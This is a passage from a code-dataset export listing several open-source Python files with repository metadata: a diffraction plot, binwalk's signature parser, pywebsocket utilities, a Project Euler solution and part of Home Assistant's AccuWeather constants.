text stringlengths 6-947k | repo_name stringlengths 5-100 | path stringlengths 4-231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6-947k | score float64 0-0.34 |
---|---|---|---|---|---|---|
# Imports added for completeness: the original file assumes a pylab-style
# environment where these names are already in scope.
from numpy import arange, sin, cos, pi
from matplotlib.pyplot import plot
import astropy.units as u

def diff_int(d=0.01*u.cm, a=0.001*u.cm, wl=400*u.nm):
    '''
    Plot the intensity of a double-slit interference pattern for slit
    separation d, slit width a, and wavelength wl.
    '''
    theta = arange(-10, 10, 1e-5)*u.degree
    # Single-slit (diffraction) envelope: (sin(x)/x)**2, with x = pi*a*sin(theta)/wl
    x = pi*a*sin(theta)/wl*u.radian
    xnew = x.decompose()
    i_single = (sin(xnew)/xnew)**2
    # Double-slit (interference) term: cos(y)**2, with y = pi*d*sin(theta)/wl
    y = pi*d*sin(theta)/wl*u.radian
    ynew = y.decompose()
    i_double = (cos(ynew))**2
    I = i_single*i_double
    plot(theta, I)
    return
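# A minimal usage sketch (added for illustration, not part of the original file):
# plot the pattern for the default slit geometry and display the figure.
if __name__ == '__main__':
    from matplotlib.pyplot import show
    diff_int(d=0.01*u.cm, a=0.001*u.cm, wl=400*u.nm)
    show()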
| kfollette/ASTR200-Spring2017 | Homework/diff_int.py | Python | mit | 441 | 0.022676 |
# Code for performing minimal parsing of libmagic-compatible signature files.
# This allows for building a single signature file from multiple other signature files,
# and for parsing out the initial magic signature bytes for each signature (used for
# pre-processing of data to limit the number of actual calls into libmagic).
#
# Also performs splitting/formatting of libmagic result text.
import io
import re
import os.path
import tempfile
import binwalk.core.common
from binwalk.core.compat import *
from binwalk.core.filter import FilterType
class MagicSignature(object):
def __init__(self, **kwargs):
self.offset = 0
self.type = ''
self.condition = ''
self.description = ''
self.length = 0
for (k,v) in iterator(kwargs):
try:
v = int(v, 0)
except KeyboardInterrupt as e:
raise e
except Exception:
pass
setattr(self, k, v)
class MagicParser(object):
'''
Class for loading, parsing and creating libmagic-compatible magic files.
This class is primarily used internally by the Binwalk class, and a class instance of it is available via the Binwalk.parser object.
    One useful method, however, is file_from_string(), which will generate a temporary magic file from a given signature string:
import binwalk
bw = binwalk.Binwalk()
# Create a temporary magic file that contains a single entry with a signature of '\\x00FOOBAR\\xFF', and append the resulting
# temporary file name to the list of magic files in the Binwalk class instance.
bw.magic_files.append(bw.parser.file_from_string('\\x00FOOBAR\\xFF', display_name='My custom signature'))
bw.scan('firmware.bin')
    All magic files generated by this class will be deleted when the class destructor is called.
'''
BIG_ENDIAN = 'big'
LITTLE_ENDIAN = 'little'
MAGIC_STRING_FORMAT = "%d\tstring\t%s\t%s\n"
DEFAULT_DISPLAY_NAME = "Raw string signature"
WILDCARD = 'x'
# If libmagic returns multiple results, they are delimited with this string.
RESULT_SEPERATOR = "\\012- "
def __init__(self, filter=None, smart=None):
'''
Class constructor.
@filter - Instance of the MagicFilter class. May be None if the parse/parse_file methods are not used.
@smart - Instance of the SmartSignature class. May be None if the parse/parse_file methods are not used.
Returns None.
'''
self.matches = set([])
self.signatures = {}
self.filter = filter
self.smart = smart
self.raw_fd = None
self.signature_count = 0
self.signature_set = set()
def __del__(self):
try:
self.cleanup()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def rm_magic_files(self):
'''
Cleans up the temporary magic file(s).
Returns None.
'''
try:
self.fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
try:
self.raw_fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def cleanup(self):
'''
Cleans up any tempfiles created by the class instance.
Returns None.
'''
self.rm_magic_files()
def file_from_string(self, signature_string, offset=0, display_name=DEFAULT_DISPLAY_NAME):
'''
Generates a magic file from a signature string.
This method is intended to be used once per instance.
If invoked multiple times, any previously created magic files will be closed and deleted.
@signature_string - The string signature to search for.
@offset - The offset at which the signature should occur.
@display_name - The text to display when the signature is found.
Returns the name of the generated temporary magic file.
'''
self.raw_fd = tempfile.NamedTemporaryFile()
self.raw_fd.write(str2bytes(self.MAGIC_STRING_FORMAT % (offset, signature_string, display_name)))
self.raw_fd.seek(0)
return self.raw_fd.name
def parse(self, file_name):
'''
        Parses magic file(s) and concatenates them into a single temporary magic file
while simultaneously removing filtered signatures.
@file_name - Magic file, or list of magic files, to parse.
Returns the name of the generated temporary magic file, which will be automatically
        deleted when the class destructor is called.
'''
self.matches = set([])
self.signatures = {}
self.signature_count = 0
self.fd = tempfile.NamedTemporaryFile()
if isinstance(file_name, type([])):
files = file_name
else:
files = [file_name]
for fname in files:
if fname:
if os.path.exists(fname) and os.path.isfile(fname):
self.parse_file(fname)
else:
binwalk.core.common.warning("Magic file '%s' does not exist!" % fname)
self.fd.seek(0)
return self.fd.name
def parse_file(self, file_name):
'''
Parses a magic file and appends valid signatures to the temporary magic file, as allowed
by the existing filter rules.
@file_name - Magic file to parse.
Returns None.
'''
# Default to not including signature entries until we've
# found what looks like a valid entry.
include = False
line_count = 0
try:
fp = open(file_name, 'rb')
for line in fp.readlines():
line = bytes2str(line)
line_count += 1
# Check if this is the first line of a signature entry
entry = self._parse_line(line)
if entry is not None:
# If this signature is marked for inclusion, include it.
if self.filter.filter(entry.description) == FilterType.FILTER_INCLUDE:
include = True
self.signature_count += 1
if not has_key(self.signatures, entry.offset):
self.signatures[entry.offset] = []
if entry.condition not in self.signatures[entry.offset]:
self.signatures[entry.offset].append(entry.condition)
else:
include = False
# Keep writing lines of the signature to the temporary magic file until
# we detect a signature that should not be included.
if include:
self.fd.write(str2bytes(line))
fp.close()
self.build_signature_set()
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("Error parsing magic file '%s' on line %d: %s" % (file_name, line_count, str(e)))
def _parse_line(self, line):
'''
Parses a signature line into its four parts (offset, type, condition and description),
looking for the first line of a given signature.
@line - The signature line to parse.
        Returns a MagicSignature object with the respective line parts populated if the line is the first of a signature.
        Returns None if the line is not the first line of a signature.
'''
entry = MagicSignature()
# Quick and dirty pre-filter. We are only concerned with the first line of a
# signature, which will always start with a number. Make sure the first byte of
# the line is a number; if not, don't process.
if line[:1] < '0' or line[:1] > '9':
return None
try:
# Split the line into white-space separated parts.
# For this to work properly, replace escaped spaces ('\ ') with '\x20'.
# This means the same thing, but doesn't confuse split().
line_parts = line.replace('\\ ', '\\x20').split()
entry.offset = line_parts[0]
entry.type = line_parts[1]
# The condition line may contain escaped sequences, so be sure to decode it properly.
entry.condition = string_decode(line_parts[2])
entry.description = ' '.join(line_parts[3:])
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("%s :: %s", (str(e), line))
# We've already verified that the first character in this line is a number, so this *shouldn't*
# throw an exception, but let's catch it just in case...
try:
entry.offset = int(entry.offset, 0)
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("%s :: %s", (str(e), line))
# If this is a string, get the length of the string
if 'string' in entry.type or entry.condition == self.WILDCARD:
entry.length = len(entry.condition)
# Else, we need to jump through a few more hoops...
else:
# Default to little endian, unless the type field starts with 'be'.
# This assumes that we're running on a little endian system...
if entry.type.startswith('be'):
endianess = self.BIG_ENDIAN
else:
endianess = self.LITTLE_ENDIAN
# Try to convert the condition to an integer. This does not allow
# for more advanced conditions for the first line of a signature,
# but needing that is rare.
try:
intval = int(entry.condition.strip('L'), 0)
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("Failed to evaluate condition for '%s' type: '%s', condition: '%s', error: %s" % (entry['description'], entry['type'], entry['condition'], str(e)))
# How long is the field type?
if entry.type == 'byte':
entry.length = 1
elif 'short' in entry.type:
entry.length = 2
elif 'long' in entry.type:
entry.length = 4
elif 'quad' in entry.type:
entry.length = 8
# Convert the integer value to a string of the appropriate endianess
entry.condition = self._to_string(intval, entry.length, endianess)
return entry
def build_signature_set(self):
'''
Builds a set of signature tuples.
Returns a set of tuples in the format: [(<signature offset>, [signature regex])].
'''
self.signature_set = set()
for (offset, sigs) in iterator(self.signatures):
for sig in sigs:
if sig == self.WILDCARD:
sig = re.compile('.')
else:
sig = re.compile(re.escape(sig))
self.signature_set.add((offset, sig))
return self.signature_set
def find_signature_candidates(self, data, end):
'''
Finds candidate signatures inside of the data buffer.
Called internally by Binwalk.single_scan.
@data - Data to scan for candidate signatures.
@end - Don't look for signatures beyond this offset.
Returns an ordered list of offsets inside of data at which candidate offsets were found.
'''
candidate_offsets = []
for (offset, regex) in self.signature_set:
candidate_offsets += [(match.start() - offset) for match in regex.finditer(data) if (match.start() - offset) < end and (match.start() - offset) >= 0]
candidate_offsets = list(set(candidate_offsets))
candidate_offsets.sort()
return candidate_offsets
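    # Illustrative note (added for clarity, not part of the original module): if a
    # signature's magic bytes live at offset 4 within its format and those bytes
    # match at position 10 in the data buffer, the candidate offset reported above
    # is 10 - 4 = 6, i.e. the position where the described file format would begin.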
def _to_string(self, value, size, endianess):
'''
Converts an integer value into a raw string.
@value - The integer value to convert.
@size - Size, in bytes, of the integer value.
@endianess - One of self.LITTLE_ENDIAN | self.BIG_ENDIAN.
Returns a raw string containing value.
'''
data = ""
for i in range(0, size):
data += chr((value >> (8*i)) & 0xFF)
if endianess != self.LITTLE_ENDIAN:
data = data[::-1]
return data
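    # Note (added): for non-negative values this is roughly equivalent to
    # struct.pack('<I', value) / struct.pack('>I', value) for 4-byte fields (with
    # the corresponding format characters for other sizes); the manual loop is
    # kept so that all of the sizes above are handled uniformly.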
def split(self, data):
'''
Splits multiple libmagic results in the data string into a list of separate results.
@data - Data string returned from libmagic.
Returns a list of result strings.
'''
try:
return data.split(self.RESULT_SEPERATOR)
except KeyboardInterrupt as e:
raise e
except Exception:
return []
| 17twenty/binwalk | src/binwalk/core/parser.py | Python | mit | 13,154 | 0.004485 |
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket utilities.
"""
import array
import errno
# Import hash classes from a module available and recommended for each Python
# version and re-export those symbols: the sha and md5 modules in Python 2.4,
# and the hashlib module in Python 2.6.
try:
import hashlib
md5_hash = hashlib.md5
sha1_hash = hashlib.sha1
except ImportError:
import md5
import sha
md5_hash = md5.md5
sha1_hash = sha.sha
import StringIO
import logging
import os
import re
import socket
import traceback
import zlib
def get_stack_trace():
"""Get the current stack trace as string.
This is needed to support Python 2.3.
TODO: Remove this when we only support Python 2.4 and above.
Use traceback.format_exc instead.
"""
out = StringIO.StringIO()
traceback.print_exc(file=out)
return out.getvalue()
def prepend_message_to_exception(message, exc):
"""Prepend message to the exception."""
exc.args = (message + str(exc),)
return
def __translate_interp(interp, cygwin_path):
"""Translate interp program path for Win32 python to run cygwin program
(e.g. perl). Note that it doesn't support path that contains space,
which is typically true for Unix, where #!-script is written.
For Win32 python, cygwin_path is a directory of cygwin binaries.
Args:
interp: interp command line
cygwin_path: directory name of cygwin binary, or None
Returns:
translated interp command line.
"""
if not cygwin_path:
return interp
m = re.match('^[^ ]*/([^ ]+)( .*)?', interp)
if m:
cmd = os.path.join(cygwin_path, m.group(1))
return cmd + m.group(2)
return interp
def get_script_interp(script_path, cygwin_path=None):
"""Gets #!-interpreter command line from the script.
It also fixes command path. When Cygwin Python is used, e.g. in WebKit,
it could run "/usr/bin/perl -wT hello.pl".
When Win32 Python is used, e.g. in Chromium, it couldn't. So, fix
"/usr/bin/perl" to "<cygwin_path>\perl.exe".
Args:
script_path: pathname of the script
cygwin_path: directory name of cygwin binary, or None
Returns:
#!-interpreter command line, or None if it is not #!-script.
"""
fp = open(script_path)
line = fp.readline()
fp.close()
m = re.match('^#!(.*)', line)
if m:
return __translate_interp(m.group(1), cygwin_path)
return None
def wrap_popen3_for_win(cygwin_path):
"""Wrap popen3 to support #!-script on Windows.
Args:
cygwin_path: path for cygwin binary if command path is needed to be
translated. None if no translation required.
"""
__orig_popen3 = os.popen3
def __wrap_popen3(cmd, mode='t', bufsize=-1):
cmdline = cmd.split(' ')
interp = get_script_interp(cmdline[0], cygwin_path)
if interp:
cmd = interp + ' ' + cmd
return __orig_popen3(cmd, mode, bufsize)
os.popen3 = __wrap_popen3
def hexify(s):
return ' '.join(map(lambda x: '%02x' % ord(x), s))
def get_class_logger(o):
return logging.getLogger(
'%s.%s' % (o.__class__.__module__, o.__class__.__name__))
class NoopMasker(object):
"""A masking object that has the same interface as RepeatedXorMasker but
just returns the string passed in without making any change.
"""
def __init__(self):
pass
def mask(self, s):
return s
class RepeatedXorMasker(object):
"""A masking object that applies XOR on the string given to mask method
with the masking bytes given to the constructor repeatedly. This object
    remembers the position in the masking bytes where the last mask() call
    ended and resumes from that point on the next call.
"""
def __init__(self, mask):
self._mask = map(ord, mask)
self._mask_size = len(self._mask)
self._count = 0
def mask(self, s):
result = array.array('B')
result.fromstring(s)
# Use temporary local variables to eliminate the cost to access
# attributes
count = self._count
mask = self._mask
mask_size = self._mask_size
for i in xrange(len(result)):
result[i] ^= mask[count]
count = (count + 1) % mask_size
self._count = count
return result.tostring()
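# Illustrative sketch (added, not part of the original module): masking is an
# involution, so XOR-ing twice with the same masking bytes restores the input.
# Assumes Python 2 byte strings:
#     masker = RepeatedXorMasker('\x12\x34\x56\x78')
#     masked = masker.mask('hello')
#     RepeatedXorMasker('\x12\x34\x56\x78').mask(masked) == 'hello'  # True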
class DeflateRequest(object):
"""A wrapper class for request object to intercept send and recv to perform
deflate compression and decompression transparently.
"""
def __init__(self, request):
self._request = request
self.connection = DeflateConnection(request.connection)
def __getattribute__(self, name):
if name in ('_request', 'connection'):
return object.__getattribute__(self, name)
return self._request.__getattribute__(name)
def __setattr__(self, name, value):
if name in ('_request', 'connection'):
return object.__setattr__(self, name, value)
return self._request.__setattr__(name, value)
# By making the wbits option negative, we can suppress the CMF/FLG (2 octets) and
# ADLER32 (4 octets) fields of zlib so that we can use the zlib module as a plain
# deflate library. DICTID won't be added as long as we don't set a dictionary.
# An LZ77 window of 32K will be used for both compression and decompression.
# For decompression, we can just use 32K to cover any window size. For
# compression, we use 32K so receivers must use 32K.
#
# Compression level is Z_DEFAULT_COMPRESSION. We don't have to match level
# to decode.
#
# See zconf.h, deflate.cc, inflate.cc of zlib library, and zlibmodule.c of
# Python. See also RFC1950 (ZLIB 3.3).
class _Deflater(object):
def __init__(self, window_bits):
self._logger = get_class_logger(self)
self._compress = zlib.compressobj(
zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -window_bits)
def compress_and_flush(self, bytes):
compressed_bytes = self._compress.compress(bytes)
compressed_bytes += self._compress.flush(zlib.Z_SYNC_FLUSH)
self._logger.debug('Compress input %r', bytes)
self._logger.debug('Compress result %r', compressed_bytes)
return compressed_bytes
class _Inflater(object):
def __init__(self):
self._logger = get_class_logger(self)
self._unconsumed = ''
self.reset()
def decompress(self, size):
if not (size == -1 or size > 0):
raise Exception('size must be -1 or positive')
data = ''
while True:
if size == -1:
data += self._decompress.decompress(self._unconsumed)
# See Python bug http://bugs.python.org/issue12050 to
# understand why the same code cannot be used for updating
# self._unconsumed for here and else block.
self._unconsumed = ''
else:
data += self._decompress.decompress(
self._unconsumed, size - len(data))
self._unconsumed = self._decompress.unconsumed_tail
if self._decompress.unused_data:
# Encountered a last block (i.e. a block with BFINAL = 1) and
# found a new stream (unused_data). We cannot use the same
# zlib.Decompress object for the new stream. Create a new
# Decompress object to decompress the new one.
#
# It's fine to ignore unconsumed_tail if unused_data is not
# empty.
self._unconsumed = self._decompress.unused_data
self.reset()
if size >= 0 and len(data) == size:
# data is filled. Don't call decompress again.
break
else:
# Re-invoke Decompress.decompress to try to decompress all
# available bytes before invoking read which blocks until
# any new byte is available.
continue
else:
# Here, since unused_data is empty, even if unconsumed_tail is
# not empty, bytes of requested length are already in data. We
# don't have to "continue" here.
break
if data:
self._logger.debug('Decompressed %r', data)
return data
def append(self, data):
self._logger.debug('Appended %r', data)
self._unconsumed += data
def reset(self):
self._logger.debug('Reset')
self._decompress = zlib.decompressobj(-zlib.MAX_WBITS)
# Compresses/decompresses given octets using the method introduced in RFC1979.
class _RFC1979Deflater(object):
"""A compressor class that applies DEFLATE to given byte sequence and
flushes using the algorithm described in the RFC1979 section 2.1.
"""
def __init__(self, window_bits, no_context_takeover):
self._deflater = None
if window_bits is None:
window_bits = zlib.MAX_WBITS
self._window_bits = window_bits
self._no_context_takeover = no_context_takeover
def filter(self, bytes):
if self._deflater is None or self._no_context_takeover:
self._deflater = _Deflater(self._window_bits)
        # Strip the last 4 octets, which are the LEN and NLEN fields of a
        # non-compressed block added for Z_SYNC_FLUSH.
return self._deflater.compress_and_flush(bytes)[:-4]
class _RFC1979Inflater(object):
"""A decompressor class for byte sequence compressed and flushed following
the algorithm described in the RFC1979 section 2.1.
"""
def __init__(self):
self._inflater = _Inflater()
def filter(self, bytes):
# Restore stripped LEN and NLEN field of a non-compressed block added
# for Z_SYNC_FLUSH.
self._inflater.append(bytes + '\x00\x00\xff\xff')
return self._inflater.decompress(-1)
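# Illustrative sketch (added, not part of the original module): _RFC1979Deflater
# strips the 0x00 0x00 0xff 0xff tail that Z_SYNC_FLUSH appends, and
# _RFC1979Inflater restores it, so filtering through both reproduces the input:
#     deflater = _RFC1979Deflater(window_bits=None, no_context_takeover=False)
#     inflater = _RFC1979Inflater()
#     inflater.filter(deflater.filter('Hello, WebSocket!'))  # == 'Hello, WebSocket!'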
class DeflateSocket(object):
"""A wrapper class for socket object to intercept send and recv to perform
deflate compression and decompression transparently.
"""
# Size of the buffer passed to recv to receive compressed data.
_RECV_SIZE = 4096
def __init__(self, socket):
self._socket = socket
self._logger = get_class_logger(self)
self._deflater = _Deflater(zlib.MAX_WBITS)
self._inflater = _Inflater()
def recv(self, size):
"""Receives data from the socket specified on the construction up
to the specified size. Once any data is available, returns it even
if it's smaller than the specified size.
"""
# TODO(tyoshino): Allow call with size=0. It should block until any
# decompressed data is available.
if size <= 0:
raise Exception('Non-positive size passed')
while True:
data = self._inflater.decompress(size)
if len(data) != 0:
return data
read_data = self._socket.recv(DeflateSocket._RECV_SIZE)
if not read_data:
return ''
self._inflater.append(read_data)
def sendall(self, bytes):
self.send(bytes)
def send(self, bytes):
self._socket.sendall(self._deflater.compress_and_flush(bytes))
return len(bytes)
class DeflateConnection(object):
"""A wrapper class for request object to intercept write and read to
perform deflate compression and decompression transparently.
"""
def __init__(self, connection):
self._connection = connection
self._logger = get_class_logger(self)
self._deflater = _Deflater(zlib.MAX_WBITS)
self._inflater = _Inflater()
def get_remote_addr(self):
return self._connection.remote_addr
remote_addr = property(get_remote_addr)
def put_bytes(self, bytes):
self.write(bytes)
def read(self, size=-1):
"""Reads at most size bytes. Blocks until there's at least one byte
available.
"""
# TODO(tyoshino): Allow call with size=0.
if not (size == -1 or size > 0):
raise Exception('size must be -1 or positive')
data = ''
while True:
if size == -1:
data += self._inflater.decompress(-1)
else:
data += self._inflater.decompress(size - len(data))
if size >= 0 and len(data) != 0:
break
# TODO(tyoshino): Make this read efficient by some workaround.
#
            # In mod_python 3.0.3 and earlier, read blocks until length bytes
            # have been read. We don't know the exact size to read while using
            # deflate, so read byte-by-byte.
            #
            # _StandaloneRequest.read, which ultimately performs
            # socket._fileobject.read, also blocks until length bytes have been read.
read_data = self._connection.read(1)
if not read_data:
break
self._inflater.append(read_data)
return data
def write(self, bytes):
self._connection.write(self._deflater.compress_and_flush(bytes))
def _is_ewouldblock_errno(error_number):
"""Returns True iff error_number indicates that receive operation would
block. To make this portable, we check availability of errno and then
compare them.
"""
for error_name in ['WSAEWOULDBLOCK', 'EWOULDBLOCK', 'EAGAIN']:
if (error_name in dir(errno) and
error_number == getattr(errno, error_name)):
return True
return False
def drain_received_data(raw_socket):
# Set the socket non-blocking.
original_timeout = raw_socket.gettimeout()
raw_socket.settimeout(0.0)
drained_data = []
# Drain until the socket is closed or no data is immediately
# available for read.
while True:
try:
data = raw_socket.recv(1)
if not data:
break
drained_data.append(data)
except socket.error, e:
# e can be either a pair (errno, string) or just a string (or
# something else) telling what went wrong. We suppress only
            # the errors that indicate that the socket would block. Those
# exceptions can be parsed as a pair (errno, string).
try:
error_number, message = e
except:
# Failed to parse socket.error.
raise e
if _is_ewouldblock_errno(error_number):
break
else:
raise e
# Rollback timeout value.
raw_socket.settimeout(original_timeout)
return ''.join(drained_data)
# vi:sts=4 sw=4 et
| CyanogenMod/android_external_chromium-trace | trace-viewer/third_party/pywebsocket/src/mod_pywebsocket/util.py | Python | bsd-3-clause | 16,267 | 0.000184 |
# Claire Jaja
# 11/1/2014
#
# Project Euler
# Problem 2
# Even Fibonacci numbers
#
# Each new term in the Fibonacci sequence is generated by adding
# the previous two terms.
# By starting with 1 and 2, the first 10 terms will be:
# 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
# By considering the terms in the Fibonacci sequence
# whose values do not exceed four million,
# find the sum of the even-valued terms.
def main():
max_value = 4000000
# set up first three terms
previous_previous_term = 1
previous_term = 1
current_term = 2
my_sum = 0
while current_term < max_value:
if current_term % 2 == 0:
my_sum += current_term
previous_previous_term = previous_term
previous_term = current_term
current_term = previous_term + previous_previous_term
print(my_sum)
if __name__ == "__main__":
main()
| clairejaja/project-euler | src/main/python/problem2/even_fibonacci_numbers.py | Python | mit | 876 | 0.001142 |
"""Constants for AccuWeather integration."""
from __future__ import annotations
from typing import Final
from homeassistant.components.weather import (
ATTR_CONDITION_CLEAR_NIGHT,
ATTR_CONDITION_CLOUDY,
ATTR_CONDITION_EXCEPTIONAL,
ATTR_CONDITION_FOG,
ATTR_CONDITION_HAIL,
ATTR_CONDITION_LIGHTNING,
ATTR_CONDITION_LIGHTNING_RAINY,
ATTR_CONDITION_PARTLYCLOUDY,
ATTR_CONDITION_POURING,
ATTR_CONDITION_RAINY,
ATTR_CONDITION_SNOWY,
ATTR_CONDITION_SNOWY_RAINY,
ATTR_CONDITION_SUNNY,
ATTR_CONDITION_WINDY,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ICON,
CONCENTRATION_PARTS_PER_CUBIC_METER,
DEVICE_CLASS_TEMPERATURE,
LENGTH_FEET,
LENGTH_INCHES,
LENGTH_METERS,
LENGTH_MILLIMETERS,
PERCENTAGE,
SPEED_KILOMETERS_PER_HOUR,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TIME_HOURS,
UV_INDEX,
)
from .model import SensorDescription
API_IMPERIAL: Final = "Imperial"
API_METRIC: Final = "Metric"
ATTRIBUTION: Final = "Data provided by AccuWeather"
ATTR_ENABLED: Final = "enabled"
ATTR_FORECAST: Final = "forecast"
ATTR_LABEL: Final = "label"
ATTR_UNIT_IMPERIAL: Final = "unit_imperial"
ATTR_UNIT_METRIC: Final = "unit_metric"
CONF_FORECAST: Final = "forecast"
COORDINATOR: Final = "coordinator"
DOMAIN: Final = "accuweather"
MANUFACTURER: Final = "AccuWeather, Inc."
MAX_FORECAST_DAYS: Final = 4
NAME: Final = "AccuWeather"
UNDO_UPDATE_LISTENER: Final = "undo_update_listener"
CONDITION_CLASSES: Final[dict[str, list[int]]] = {
ATTR_CONDITION_CLEAR_NIGHT: [33, 34, 37],
ATTR_CONDITION_CLOUDY: [7, 8, 38],
ATTR_CONDITION_EXCEPTIONAL: [24, 30, 31],
ATTR_CONDITION_FOG: [11],
ATTR_CONDITION_HAIL: [25],
ATTR_CONDITION_LIGHTNING: [15],
ATTR_CONDITION_LIGHTNING_RAINY: [16, 17, 41, 42],
ATTR_CONDITION_PARTLYCLOUDY: [3, 4, 6, 35, 36],
ATTR_CONDITION_POURING: [18],
ATTR_CONDITION_RAINY: [12, 13, 14, 26, 39, 40],
ATTR_CONDITION_SNOWY: [19, 20, 21, 22, 23, 43, 44],
ATTR_CONDITION_SNOWY_RAINY: [29],
ATTR_CONDITION_SUNNY: [1, 2, 5],
ATTR_CONDITION_WINDY: [32],
}
FORECAST_SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"CloudCoverDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"CloudCoverNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"Grass": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:grass",
ATTR_LABEL: "Grass Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"HoursOfSun": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-partly-cloudy",
ATTR_LABEL: "Hours Of Sun",
ATTR_UNIT_METRIC: TIME_HOURS,
ATTR_UNIT_IMPERIAL: TIME_HOURS,
ATTR_ENABLED: True,
},
"Mold": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:blur",
ATTR_LABEL: "Mold Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"Ozone": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:vector-triangle",
ATTR_LABEL: "Ozone",
ATTR_UNIT_METRIC: None,
ATTR_UNIT_IMPERIAL: None,
ATTR_ENABLED: False,
},
"Ragweed": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:sprout",
ATTR_LABEL: "Ragweed Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"RealFeelTemperatureMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureShadeMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"RealFeelTemperatureShadeMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"ThunderstormProbabilityDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"ThunderstormProbabilityNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"Tree": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:tree-outline",
ATTR_LABEL: "Tree Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"UVIndex": {
ATTR_DEVICE_CLASS: None,
